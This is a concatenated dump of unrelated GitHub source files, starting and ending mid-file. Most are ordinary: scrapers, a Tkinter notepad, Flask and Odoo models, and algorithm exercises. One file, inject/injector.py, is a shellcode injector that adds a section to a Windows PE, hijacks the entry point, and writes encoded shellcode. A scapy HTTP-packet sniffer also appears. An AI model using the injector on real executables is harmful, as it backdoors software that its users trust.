p_righteye) / np.linalg.norm(p_left - p_right)\n\ndef get_points(results):\n landmarks = results.multi_face_landmarks[0]\n p_lefteye = mean([landmarks.landmark[i] for i in left_eye])\n p_righteye = mean([landmarks.landmark[i] for i in right_eye])\n p_left = 
to_array(landmarks.landmark[356])\n p_right = to_array(landmarks.landmark[127])\n return p_lefteye, p_righteye, p_left, p_right\n\ndef to_array(p):\n return np.array([p.x, p.y, p.z])\n\ndef mean(points):\n return np.mean(np.array([to_array(p) for p in points]), axis=0)\n\n\n############ thurstone\nfrom scipy.special import ndtri, ndtr\nfrom scipy.optimize import least_squares\n\n\ndef make_countmatrix(data, school2idx):\n A = np.zeros((len(school2idx), len(school2idx)))\n for s1, s2 in data.index:\n A[school2idx[s1], school2idx[s2]] += 1\n return A\n\ndef sort_schools(A, school2idx, axis=0):\n schools_sorted = [list(school2idx)[idx] for idx in np.argsort(A.sum(axis=axis))]\n # list(reversed(schools_sorted))\n return schools_sorted\n\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\ndef logit(y):\n return -np.log((1 - y) / y)\n\ndef compute_p(data):\n return (data.win1 + 1) / (data.win1 + data.win2 + 2)\n\ndef compute_mu(data, F=ndtri):\n mu = {}\n for (s1, s2), p in compute_p(data).items():\n if s2 == schools_sorted[-1]:\n mu[s1] = F(p)\n return mu\n\ndef to_np(d):\n return np.array([d[city] for city in schools_sorted[:-1]])\n\ndef cost(schools_sorted, p, mu):\n N = len(mu)\n mu_1 = {schools_sorted[i]: mu[i] for i in range(N)}\n mu_1[schools_sorted[-1]] = 0\n return np.array([(v - ndtr(mu_1[s1] - mu_1[s2]))**2 for (s1, s2), v in p.items()])","repo_name":"Lapu-Lapu/structural_beauty","sub_path":"notebooks/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5872585858","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom pathlib import Path\nimport urllib\nimport time\n\n# 웹 페이지를 구해 해석한다\nload_url = \"https://www.epicurious.com/expert-advice/how-to-swirl-peanut-butter-on-brownies\"\nhtml = requests.get(load_url)\nsoup = BeautifulSoup(html.content, \"html.parser\")\nprint(html)\n# 저장용 폴더를 만든다.\nout_folder = 
Path(\"download3\")\nout_folder.mkdir(exist_ok=True)\n\n# 모든 img 태그를 검색해 링크를 구한다.\nfor element in soup.find_all(\"img\"):\n src = element.get(\"src\")\n print(src)\n # 절대 URL을 만들어 이미지 데이터를 구한다.\n image_url = urllib.parse.urljoin(load_url, src)\n imgdata = requests.get(image_url)\n\n # URL에서 마지막에 있는 파일명을 추출하고 저장 폴더명과 연결한다.\n filename = image_url.split(\"/\")[-1]\n out_path = out_folder.joinpath(filename)\n\n # 이미지 데이터를 파일에 쓴다\n with open(out_path, mode=\"wb\") as f:\n f.write(imgdata.content)\n \n # 한번 엑세스했으므로 1초 기다린다.\n time.sleep(1)\n\n\n\n\n\n","repo_name":"yipf1123/Study","sub_path":"Book Transcription/Python/Python 2학년 스크래핑의 구조/ch02_HTML을 해석해 보자/ch02-14 copy.py","file_name":"ch02-14 copy.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"724482598","text":"from tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import filedialog\n\nroot = Tk()\nroot.title(\"Блокнот\")\nroot.resizable(True, True)\nroot.geometry('400x400+0+0')\n\nmain_menu = Menu(root)\nroot.config(menu=main_menu)\n\ndef about_program():\n messagebox.showinfo(\"Блокнот\", \"Версия программы - 0.0.0\")\n\ndef quit_program():\n answer = messagebox.askokcancel(\"Выход\", \"Вы действительно решили выйти из этого чудо-блокнота?\")\n if answer:\n root.destroy()\n\ndef change_theme(theme):\n t['bg'] = theme_colors[theme]['text_bg']\n t['fg'] = theme_colors[theme]['text_fg']\n t['insertbackground'] = theme_colors[theme]['cursor']\n t['selectbackground'] = theme_colors[theme]['select_bg']\n\ndef open_file():\n file_path = filedialog.askopenfilename(title = \"Выбор файла\", filetypes = ((\"текстовые документы (*.txt)\",\"*.txt\"),(\"Все файлы\",\"*.*\")))\n if file_path:\n t.delete('1.0', END)\n t.insert('1.0', open(file_path, encoding='utf-8').read())\n\ndef save_file():\n file_path = filedialog.asksaveasfilename(title = \"Выбор файла\", filetypes = ((\"текстовые документы 
(*.txt)\",\"*.txt\"),(\"Все файлы\",\"*.*\")))\n f = open(file_path, 'w', encoding='utf-8')\n text = t.get('1.0', END)\n f.write(text)\n f.close()\n\nfile_menu = Menu(main_menu, tearoff=0)\nmain_menu.add_cascade(label = \"Файл\", menu=file_menu)\nfile_menu.add_command(label = \"Открыть\", command=open_file)\nfile_menu.add_command(label = \"Сохранить\", command=save_file)\nfile_menu.add_separator()\nfile_menu.add_command(label = \"Выход\", command=quit_program)\n\ntheme_menu = Menu(main_menu, tearoff=0)\nmain_menu.add_cascade(label=\"Разное\", menu=theme_menu)\ntheme_menu_sub = Menu(theme_menu, tearoff=0)\ntheme_menu.add_cascade(label = \"Оформление\", menu=theme_menu_sub)\ntheme_menu_sub.add_command(label = \"Light Theme\", command=lambda: change_theme('light'))\ntheme_menu_sub.add_command(label = \"Dark Theme\", command=lambda: change_theme('dark'))\ntheme_menu.add_command(label = \"О программе\", command=about_program)\n\n\n\ntheme_menu_sub = Menu(theme_menu, tearoff=0)\n\n# theme_menu_sub.add_command(label=\"Онлайн\")\n# theme_menu_sub.add_command(label=\"Оффлайн\")\n\nf_text = Frame(root)\nf_text.pack(fill=BOTH, expand=1)\n\ntheme_colors = {\n \"dark\" : {\n 'text_bg' : '#343D46', 'text_fg' : '#C6DEC1', 'cursor' : '#EDA756', 'select_bg' : '#4E5a65'\n },\n \"light\" : {\n 'text_bg' : '#fff', 'text_fg' : '#000', 'cursor' : '#8000FF', 'select_bg' : '#777'\n }\n}\n\nt = Text(f_text, font = \"Tahoma 12\", bg = theme_colors['dark']['text_bg'], fg = theme_colors['dark']['text_fg'], padx = 10, pady = 10, wrap = WORD, insertbackground = theme_colors['dark']['cursor'], selectbackground = theme_colors['dark']['select_bg'], width=0, spacing3=10)\nt.pack(fill=X,expand=1, side=LEFT)\n\n\nscroll = Scrollbar(f_text,command=t.yview)\nscroll.pack(fill=Y,side=LEFT)\nt.config(yscrollcommand = 
scroll.set)\n\n\nroot.mainloop()","repo_name":"BondarenkoAleksey/Python","sub_path":"notepad.py","file_name":"notepad.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42023764764","text":"\"\"\"Upload models.\"\"\"\nimport os\nimport uuid\nfrom typing import Optional\nfrom datetime import datetime\nfrom werkzeug.utils import secure_filename\nfrom werkzeug.datastructures import FileStorage\nfrom flask import current_app as app\nfrom flask_babel import lazy_gettext as _\n\nfrom app.database import DBItem, db, UUID, IntEnum\nfrom app.utils.enums import StringEnum\nfrom app.utils.image import Img\n\n\n# DB strings lengths\nMAX_NAME_LEN = 32\nMAX_DESCRIPTION_LEN = 1024\nMAX_PATH_LEN = 256\n\n\nclass UploadType(StringEnum):\n \"\"\"Upload file types.\"\"\"\n OTHER = _(\"Other\")\n PHOTO = _(\"Photo\")\n HISTORICAL_PHOTO = _(\"Historical photo\")\n MAP = _(\"Map\")\n ARTICLE = _(\"Article\")\n BOOK = _(\"Book\")\n DOCUMENT = _(\"Document\")\n\n\nclass Upload(DBItem):\n \"\"\"Uploads model.\n\n The uploaded file is stored in a selected folder with in a UUID.extension\n format. 
This way the filename conflicts are reduced.\n \"\"\"\n name = db.Column(db.String(MAX_NAME_LEN), nullable=False)\n description = db.Column(db.String(MAX_DESCRIPTION_LEN))\n type = db.Column(IntEnum(UploadType), nullable=False)\n path = db.Column(db.String(MAX_PATH_LEN), nullable=False)\n created = db.Column(db.DateTime(), default=datetime.utcnow, nullable=False)\n\n # Object UUID that is related to this file\n object_uuid = db.Column(UUID, index=True)\n created_by_id = db.Column(db.Integer, db.ForeignKey('user.id'),\n nullable=False)\n created_by = db.relationship('User')\n\n def _delete_file(self):\n \"\"\"Deletes files related to this object.\"\"\"\n delete_file(self.path)\n delete_file(self.thumbnail)\n\n def _make_thumbnail(self):\n \"\"\"Creates thumbnail.\"\"\"\n dest = get_full_path(self.thumbnail)\n img = Img(get_full_path(self.path))\n img.thumbnail(dest, app.config['THUMBNAIL_SIZE_PX'])\n\n def _save_file(self, file: FileStorage, subfolder: str):\n \"\"\"Stores file to uploads dir, resize if needed\n\n Args:\n file: Uploaded file handle\n subfolder: Subfolder under uploads dir to write to\n \"\"\"\n is_img = self.type in (UploadType.PHOTO, UploadType.HISTORICAL_PHOTO)\n self.path = save_uploaded_file(file, subfolder, str(uuid.uuid4()),\n is_img)\n if is_img:\n self._make_thumbnail()\n\n def delete(self):\n \"\"\"Deletes file from drive and database.\"\"\"\n self._delete_file()\n super().delete()\n\n def replace(self, file: FileStorage):\n \"\"\"Replaces the file related to this upload with a new one.\n\n Args:\n file: Uploaded file handle\n \"\"\"\n self._delete_file()\n subfolder = os.path.dirname(self.path)\n self._save_file(file, subfolder)\n\n @classmethod\n def create(cls, file: FileStorage, subfolder: str, # type: ignore\n *args, **kwargs):\n \"\"\"Create a new DB record and stores uploaded file to selected folder\n\n Args:\n file: Uploaded file handle\n subfolder: Folder relative to uploads folder to save data to\n \"\"\"\n # pylint: 
disable=arguments-differ\n obj = super().create(path='', *args, **kwargs)\n obj._save_file(file, subfolder)\n return obj\n\n @classmethod\n def get(cls, upload_type: UploadType):\n \"\"\"Gets query for all uploads of givent type\n\n Args:\n upload_type: Type to query for\n \"\"\"\n return cls.query.filter(cls.type == upload_type)\n\n @property\n def thumbnail(self):\n \"\"\"Returns relative path to thumbnail\"\"\"\n img_dir, name = os.path.split(self.path)\n return os.path.join(img_dir, 'thumbnail', name)\n\n\ndef get_full_path(path: str) -> str:\n \"\"\"Gets full path to an uploaded file.\n\n Args:\n path: Relative path to file (from uploads folder)\n Returns:\n Full path to file\n \"\"\"\n directory = os.path.join(app.instance_path, app.config['UPLOAD_DIR'])\n return os.path.join(directory, path)\n\n\ndef delete_file(path: Optional[str]):\n \"\"\"Removes file from the uploads dir (if exists)\n\n Args:\n path: Relative path to file\n \"\"\"\n if not path:\n return\n filename = get_full_path(path)\n if os.path.exists(filename):\n os.unlink(filename)\n\n\ndef save_uploaded_file(file, subfolder: str, filename: str,\n reduce: bool = False) -> str:\n \"\"\"Saves uploaded file to filesystem directly without DB entry.\n\n Args:\n file: Opened file handle\n subfolder: Folder under uploads directory to store file to\n filename: Name to save the file as. 
File extension is added if not set\n reduce: Assume file is image, reduce it's size before saving\n Returns:\n str: Path to the file under upload dir\n \"\"\"\n filename = secure_filename(filename)\n\n extension = os.path.splitext(file.filename)[1]\n given_extension = os.path.splitext(filename)[1]\n if extension != given_extension:\n filename += extension\n\n directory = get_full_path(subfolder)\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n full_path = os.path.join(directory, filename)\n if reduce:\n img = Img(file)\n img.thumbnail(full_path, app.config['IMAGE_MAX_SIZE_PX'])\n else:\n file.save(full_path)\n return os.path.join(subfolder, filename)\n","repo_name":"kajusK/HiddenPlaces","sub_path":"app/models/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":5368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"39189806730","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\nfrom odoo.exceptions import UserError\n\nclass ResUsers(models.Model):\n _inherit = 'res.users'\n\n left_amount = fields.Float(compute='_compute_amount', store=True, string=u'账户余额')\n to_add_amount = fields.Float(compute='_compute_amount', store=True, string=u'待入账金额')\n to_cash_amount = fields.Float(compute='_compute_amount', store=True, string=u'提现中金额')\n\n owner_account = fields.Boolean(search='_owner_account', store=False)\n\n shop_ids = fields.One2many('amazon.shop', 'operator_id', string=u'亚马逊店铺')\n transaction_details = fields.One2many('transaction.detail', 'merchant_id')\n\n @api.model\n def _owner_account(self, operation, value):\n if self.user_has_groups('b2b_platform.b2b_shop_operator') or \\\n self.user_has_groups('b2b_platform.b2b_seller'):\n merchant = self.env.user.merchant_id or self.env.user\n return [('id', '=', merchant.id)]\n else:\n users = self.env['res.users'].search([\n '|',\n ('user_type', '=', 'merchant'),\n ('id', '=', 1),\n ])\n return [('id', 'in', 
users.ids)]\n\n @api.multi\n @api.depends('transaction_details.state')\n def _compute_amount(self):\n # print 'compute account amount'\n for record in self:\n left_amount = 0\n to_add_amount = 0\n to_cash_amount = 0\n for detail in record.transaction_details:\n if detail.state == 'draft':\n if detail.type in ['cash']:\n to_cash_amount += detail.amount\n elif detail.type in ['supplier_invoice', 'charge', 'submitted_appeal']:\n to_add_amount += detail.amount\n elif detail.state == 'done':\n if detail.type in ['distributor_invoice', 'cash', 'received_appeal']:\n left_amount -= detail.amount\n elif detail.type in ['supplier_invoice', 'charge', 'submitted_appeal']:\n left_amount += detail.amount\n record.to_add_amount = to_add_amount\n record.to_cash_amount = to_cash_amount\n record.left_amount = left_amount - to_cash_amount\n if record.left_amount < 0:\n raise UserError(u'账户余额不足!')\n\n @api.multi\n def pass_audit(self):\n '''审核通过'''\n self.ensure_one()\n self.write({\n 'groups_id': [(6, False, [self.env.ref('b2b_platform.b2b_seller').id])],\n 'audit_state': 'pass',\n })\n #创建供应商库位\n location_obj = self.env['stock.location']\n partner_id = self.partner_id.id\n location_id = self.env.ref('b2b_platform.supplier_stock').id\n location = location_obj.search([('partner_id', '=', partner_id), ('location_id', '=', location_id)])\n if not location:\n location_obj.create({\n 'name': self.name,\n 'location_id': location_id,\n 'partner_id': partner_id,\n })\n\n @api.multi\n def view_transaction_detail(self):\n self.ensure_one()\n merchant = self.merchant_id or self\n return {\n 'name': u'交易明细',\n 'type': 'ir.actions.act_window',\n 'res_model': 'transaction.detail',\n 'view_mode': 'tree,',\n 'view_type': 'form',\n 'views': [\n (self.env.ref('amazon_api.transaction_detail_tree').id, 'tree')],\n 'domain': [('merchant_id', '=', merchant.id)],\n 'target': 'current',\n 
}\n","repo_name":"ljp1992/HZMX","sub_path":"amazon_api/models/res_users.py","file_name":"res_users.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"37170213824","text":"import unittest\nfrom AirportAtlas import AirportAtlas \n\n\nclass AtlasDistanceTest(unittest.TestCase):\n\n def setUp(self):\n print (\"Before the Test\")\n\n self.known_values = ((53.34, 6.2), (53.34, 6.2)) #####Coordinates of Dublin.\n self.testAtlas = AirportAtlas(\"airport.csv\")\n\n \n def test_getDistBetween_known_values(self):\n code1 = self.known_values[0]\n code2 = self.known_values[1]\n \n result = self.testAtlas.getDistance(code1, code2)\n self.assertEqual(0, result) ######Distance fro Dublin to Dublin should be zero\n\n def tearDown(self):\n print (\"After the Test\")\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"BennyMurray/Fuel-o-Tron","sub_path":"Testing/TEST - AirportAtlas.py","file_name":"TEST - AirportAtlas.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11280862958","text":"import sys\nfrom collections import deque \n\ndef distance(adj, s, t):\n dist=[ 'inf' for _ in (adj)]\n #print('dist',dist)\n q=deque([s])\n dist[s]=0\n #print(dist)\n while len(q)!=0:\n u=q.popleft()\n #print(u)\n #print(q)\n for i in adj[u]:\n if dist[i]=='inf':\n q.append(i)\n dist[i]=dist[u]+1\n if dist[t] == 'inf':\n return -1\n return dist[t]\n\nif __name__ == '__main__':\n #data=[4,4,1,2,4,1,2,3,3,1,2,4]\n #data=[5,4,5,2,1,3,3,4,1,4,3,5]\n input = sys.stdin.read()\n data = list(map(int, input.split()))\n n, m = data[0:2]\n data = data[2:]\n edges = list(zip(data[0:(2 * m):2], data[1:(2 * m):2]))\n adj = [[] for _ in range(n)]\n for (a, b) in edges:\n adj[a - 1].append(b - 1)\n adj[b - 1].append(a - 1)\n s, t = data[2 * m] - 1, data[2 * m + 1] - 1\n #print(edges)\n 
#print(adj)\n #print(s,t)\n print(distance(adj, s, t))\n","repo_name":"chrisxxdvocatus/algorithms_on_graphs","sub_path":"w3.py","file_name":"w3.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"43316129448","text":"import os\r\nimport time\r\nfrom selenium.webdriver.chrome.options import Options # 选项功能\r\nimport requests\r\nfrom selenium.webdriver.chrome.service import Service\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nheaders ={\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'\r\n}\r\n#url = 'https://www.instagram.com/p/CtTmD-AObNp/?igshid=MzRlODBiNWFlZA%3D%3D'\r\n\"\"\" PLEASE PASTE YOUR LINK HERE!!! \"\"\"\r\nurl = 'paste your link here!!!' # paste your link here!!!\r\n\r\ndef get_next(): #get next page\r\n button = driver.find_element(By.XPATH, '//div[@class=\" _9zm2\"]')\r\n driver.execute_script(\"arguments[0].click();\", button)\r\n time.sleep(1)\r\n\r\ndef get_first_page(): #get the information of first page\r\n url = driver.find_element(By.XPATH, '//*[@class=\"_acay\"]/li[2]/div/div/div/div/div/img').get_attribute('src')\r\n return url\r\n time.sleep(2)\r\n\r\ndef get_other_pages(): #get the information of other pages\r\n url_2 = driver.find_element(By.XPATH, '//*[@class=\"_acay\"]/li[3]/div/div/div/div/div/img').get_attribute('src')\r\n return url_2\r\n\r\nif __name__ == '__main__':\r\n if not os.path.exists('ins-img'): #���果当前路径没有存放图片的文件夹,则创建一个\r\n os.mkdir('ins-img')\r\n \"\"\"添加无头模式,免开浏览器\"\"\"\r\n chrome_options = Options()\r\n chrome_options.add_argument('--headless')\r\n\r\n service = Service('chromedriver.exe')\r\n driver = webdriver.Chrome(service=service, options=chrome_options)\r\n driver.get(url)\r\n #driver.maximize_window()\r\n driver.implicitly_wait(20)\r\n time.sleep(5)\r\n\r\n #pic_url = 
driver.find_element(By.XPATH, '//*[@class=\"_acay\"]/li[2]/div/div/div/div/div/img').get_attribute('src')\r\n pic_url = get_first_page()\r\n print(pic_url)\r\n pic_url_list = pic_url.split('/')\r\n pic_url_list_1 = pic_url_list[5].split('?')[0] #获取jpg文件名\r\n print(pic_url_list_1)\r\n response = requests.get(url = pic_url, headers=headers)\r\n with open(f'ins-img/{pic_url_list_1}.jpg', mode='wb') as f:\r\n f.write(response.content)\r\n print('已经下载完成第1张')\r\n #\r\n #用while True 遍历所有\"下一页\",当到最后一页时,会报错,此时使用try-except用break 即可.\r\n while True:\r\n try:\r\n # for i in range(2,8):\r\n get_next()\r\n pic_url_other = get_other_pages()\r\n print(pic_url_other)\r\n other_url_list = pic_url_other.split('/')\r\n other_url_list_1 = other_url_list[5].split('?')[0]\r\n response = requests.get(url=pic_url_other, headers=headers)\r\n with open(f'ins-img/{other_url_list_1}.jpg', mode='wb') as f:\r\n f.write(response.content)\r\n print(f'已经下载完成{other_url_list_1}')\r\n\r\n except Exception as e:\r\n print(e)\r\n break\r\n\r\n\r\n\r\n print('=====下载完成=====')\r\n driver.quit()\r\n","repo_name":"fanyiang92/download-instagram-photos","sub_path":"insdownload.py","file_name":"insdownload.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22152925674","text":"#WAP to input three digit number and print its reverse\n\nno = int(input(\"Enter 3 Digit Number :\")) #276 -> 27 -> 2\n\nrem=no%10 #6\nrev=rem\nno=no//10\n\nrem=no%10 #7\nrev=rev*10+rem\nno=no//10\n\nrem=no%10 #2\nrev=rev*10+rem\n\nprint(\"Reverse = \",rev)\n\n\n","repo_name":"shrenik77130/Repo5Batch22PythonWeb","sub_path":"#3_Python_Complex_Programs/Program15.py","file_name":"Program15.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35753444702","text":"\nimport numpy as np\nfrom sklearn.datasets import load_iris\n\n# Load the 
dataset\niris = load_iris()\n\n# Print the features and target variable\nprint(\"Features: \", iris.feature_names)\nprint(\"Target variable: \", iris.target_names)\n\n# X = np.array(iris.data)\n# y = np.array(iris.target)\n\n# display data point and class\n# print(X)\n# print(y)\n\n\n# implementation with sklearn library Naive Bayes\nfrom sklearn.naive_bayes import GaussianNB\n\ndef classify_iris(sepal_length, sepal_width, petal_length, petal_width):\n # Load the IRIS dataset\n iris = load_iris()\n\n # Create a Gaussian Naive Bayes classifier\n clf = GaussianNB()\n\n # Train the classifier on the IRIS dataset\n clf.fit(iris.data, iris.target)\n\n # Create a feature vector for the new flower\n new_flower = [[sepal_length, sepal_width, petal_length, petal_width]]\n\n # Use the trained classifier to predict the class of the new flower\n predicted_class = clf.predict(new_flower)\n\n # Convert the predicted class index to the corresponding class name\n class_names = iris.target_names.tolist()\n predicted_class_name = class_names[predicted_class[0]]\n\n return predicted_class_name\n\npredicted_class = classify_iris(8.1, 2.5, 2.4, 0.2)\nprint(f'prediction with sklearn(class): {predicted_class}')\n\n\n\n# implementation with only NUMPY \ndef classify_iris_np(sepal_length, sepal_width, petal_length, petal_width):\n # Load the IRIS dataset\n iris = load_iris()\n\n # Split the dataset into features and labels\n X = iris.data\n y = iris.target\n\n # Compute the mean and variance of each feature for each class\n class_means = [np.mean(X[y == i], axis=0) for i in range(3)]\n class_variances = [np.var(X[y == i], axis=0) for i in range(3)]\n\n # Compute the class priors\n class_priors = np.bincount(y) / len(y)\n\n # Compute the likelihoods for each feature of the test example\n likelihoods = [[np.exp(-(x - mean)**2 / (2 * variance)) / np.sqrt(2 * np.pi * variance)\n for x, mean, variance in zip([sepal_length, sepal_width, petal_length, petal_width], class_means[i], 
class_variances[i])]\n for i in range(3)]\n\n # Compute the joint probabilities for each class\n joint_probabilities = np.prod(likelihoods, axis=1) * class_priors\n\n # Normalize the joint probabilities to get the posterior probabilities\n posterior_probabilities = joint_probabilities / np.sum(joint_probabilities)\n\n # Return the class with the highest posterior probability\n predicted_class_index = np.argmax(posterior_probabilities)\n predicted_class_name = iris.target_names[predicted_class_index]\n\n return predicted_class_name\n\npredicted_class_np = classify_iris_np(8.1, 2.5, 2.4, 0.2)\nprint(f'prediction with only np(class): {predicted_class_np}')\n","repo_name":"mikiya09/DataSci","sub_path":"ml/algorithms/NaiveBayes.py","file_name":"NaiveBayes.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"27822377830","text":"from scapy.all import *\r\n\r\n\r\ndef http_header(packet):\r\n http_packet = str(packet)\r\n if http_packet.find('POST /result HTTP/1.1'):\r\n return True\r\n\r\n\r\nt = sniff(count=1, prn=http_header, filter='tcp port 80')\r\nprint(t[0].show())\r\n","repo_name":"segev-harpaz/project","sub_path":"project/project1.py","file_name":"project1.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29455355865","text":"import sys\nfrom inject.shellcode import Shellcode\nfrom inject.output import Output\nfrom inject.pe_manager import PEManager\nfrom inject.common import CommonMixin\nfrom typing import List\nfrom pathlib import Path\nfrom shutil import copy\nfrom utils import shellcode_encoder\nimport mmap\nfrom struct import pack\nfrom pefile import PE\n\nHEADER_SIZE = 40\nEXTRA_SIZE_TO_RESTORE = 8\n\n\nclass Injector(CommonMixin):\n def __init__(\n self, shellcode: bytes, file: Path, output: Path, options: dict = None\n ):\n # Verbosity\n options = 
options or {}\n\n # Set Basics\n self.shellcode: Shellcode = Shellcode(shellcode, options)\n self.output: Output = Output(\n output, file, {\"log_level\": int(options.get(\"log_level\", 1))}\n )\n\n # Strategies\n self.cave = options.get(\"cave\", \"auto\")\n self.enter = options.get(\"enter\", \"jump\")\n self.encoder = options.get(\"encoder\", \"\")\n\n # Loaded /Computed Later\n self.manager: PEManager = None\n\n super().__init__(options)\n\n def inject(self):\n self.setup()\n if self.cave == \"new-section\":\n self.expand()\n self.create_new_section() # may regenerate PE\n else:\n print(f\"[!] Cave option {self.cave} is not supported or recognized.\")\n sys.exit()\n if self.enter == \"new-section\":\n self.enter_at_last_section()\n self.manager.save()\n elif self.enter == \"jump\":\n original_ins = self.manager.get_ins(take=6)\n self.enter_with_jump()\n self.manager.save()\n new_ins = self.manager.get_ins(take=6)\n self.out(\"-- Original Starting Instructions --\")\n self.manager.outins(original_ins)\n self.out(\"-- Modified Starting Instructions --\")\n self.manager.outins(new_ins)\n else:\n print(f\"[!] 
Enter option {self.enter} is not supported or recognized.\")\n sys.exit()\n\n if self.encoder:\n self.write_encoded_shellcode()\n else:\n self.write_shellcode()\n self.manager.save()\n self.out(\"-- Injection Complete --\", level=3)\n\n def create_new_section(self):\n self.load_required()\n self.out(\"-- Creating New Section --\", level=2)\n self.manager = self.manager.create_new_section(self.shellcode, \".extra\")\n\n def enter_at_last_section(self):\n self.out(\"-- Changing Entry Point --\", level=2)\n self.manager = self.manager.enter_at_last_section()\n\n def enter_with_jump(self):\n self.out(\"-- Changing Entry Point --\", level=2)\n self.manager = self.manager.enter_with_jump(self.shellcode)\n\n def write_encoded_shellcode(self):\n self.out(\"-- Injecting Encoded Shellcode --\", level=2)\n self.manager.write_shellcode_stub(self.shellcode)\n self.manager.write_shellcode_blob(self.shellcode)\n\n def write_shellcode(self):\n self.out(\"-- Injecting Shellcode --\", level=2)\n self.manager.write_shellcode(self.shellcode)\n\n def setup(self):\n self.init()\n self.load()\n\n def init(self):\n self.out(\"-- Preparing Output --\", level=2)\n # delete old output if it exists\n self.output.clean()\n # copy source file to output file\n self.output.create_from_source()\n\n def init_required(self):\n if not self.is_init():\n msg = \"[!] PEManager not initialized. Output may not exist. 
Please call 'init' first.\"\n print(msg)\n sys.exit()\n\n def is_init(self) -> bool:\n if not self.output.exists():\n return False\n return True\n\n def expand(self):\n self.out(\"-- Expanding File --\", level=2)\n # actually expand the file\n self.output.expand_for_sc(\n self.shellcode.get_final_size(), self.manager.file_alignment()\n )\n\n def load(self):\n self.init_required()\n self.manager = PEManager(self.output, options={\"log_level\": self.log_level})\n self.out(\"-- PE Basic Info --\")\n self.manager.dump_basic_info()\n\n def load_required(self):\n if not self.is_loaded():\n print('[!] PE was not loaded into \"manager\" target on PEManager')\n sys.exit()\n\n def is_loaded(self) -> bool:\n if not self.manager:\n return False\n return True\n","repo_name":"3lpsy/exutils","sub_path":"inject/injector.py","file_name":"injector.py","file_ext":"py","file_size_in_byte":4377,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"10096792294","text":"import os\nimport argparse\nimport model\nimport torch\nfrom configparser import ConfigParser\nfrom operator import attrgetter\nfrom utils.watcher import ActivationWatcher\nfrom model.lenet import LeNet\n\nnum_classes = {\"imagenet\": 1000, \"cifar10\": 10, \"cifar100\": 100}\nparser = argparse.ArgumentParser()\n# setup for model\nparser.add_argument('--model', default='', help='model', type=str)\nparser.add_argument('--config', default='', type=str,\n help='use configure for words and blocksize')\nparser.add_argument('--dataset', default='imagenet', type=str,\n help=\"dataset\")\nparser.add_argument('--conv-word', default=0, help='words update conv layer', type=int)\nparser.add_argument('--conv-block', default=1.0, help='blocksize update conv layer', type=float)\nparser.add_argument('--fc-word', default=0, help='words update fc layer', type=int)\nparser.add_argument('--fc-block', default=1.0, help='blocksize update fc layer', 
type=float)\n\nparser.add_argument('--init', default=0, help='initialize', type=int)\nparser.add_argument('--conv-word-init', default=0, help='conv words initialize', type=int)\nparser.add_argument('--conv-block-init', default=0, help='conv blocksize initialize', type=int)\nparser.add_argument('--fc-word-init', default=0, help='fc words initialize', type=int)\nparser.add_argument('--fc-block-init', default=0, help='fc blocksize initialize', type=int)\n\n\n\ndef compute_rate(layers, rate=0.95):\n layer_rate = {}\n weight = {}\n total = 0\n for layer in layers:\n weight[layer] = attrgetter(layer+ '.weight.data')(model).detach().numel()\n total += weight[layer]\n for layer in layers:\n layer_rate[layer] = pow(weight[layer]/total, 2)\n return layer_rate\n\nif __name__=='__main__':\n args = parser.parse_args()\n blockconfig = ConfigParser()\n wordconfig = ConfigParser()\n blockconfig.read(os.path.join(args.config, 'block.config'), encoding='UTF-8')\n wordconfig.read(os.path.join(args.config, 'word.config'), encoding='UTF-8')\n model = model.__dict__[args.model](pretrained=(args.dataset == 'imagenet'), num_classes=num_classes[args.dataset])\n watcher = ActivationWatcher(model)\n layers = [layer for layer in watcher.layers[13:]]\n\n #layer_rate = compute_rate(layers=layers)\n for layer in layers:\n #update the words \n if(layer in wordconfig[args.model]):\n current_words = int(wordconfig[args.model][layer])\n if 'conv' in layer or 'features' in layer:\n if args.init and args.conv_word_init:\n wordconfig[args.model][layer] = str(args.conv_word_init)\n else:\n wordconfig[args.model][layer] = str(int(current_words - args.conv_word)) #\n if 'fc' in layer or 'classifier' in layer or 'linear' in layer:\n if args.init and args.fc_word_init:\n wordconfig[args.model][layer] = str(args.fc_word_init)\n else:\n wordconfig[args.model][layer] = str(int(current_words - args.fc_word)) #\n else: # initialization\n wordconfig.set(args.model, layer, str(0))\n with 
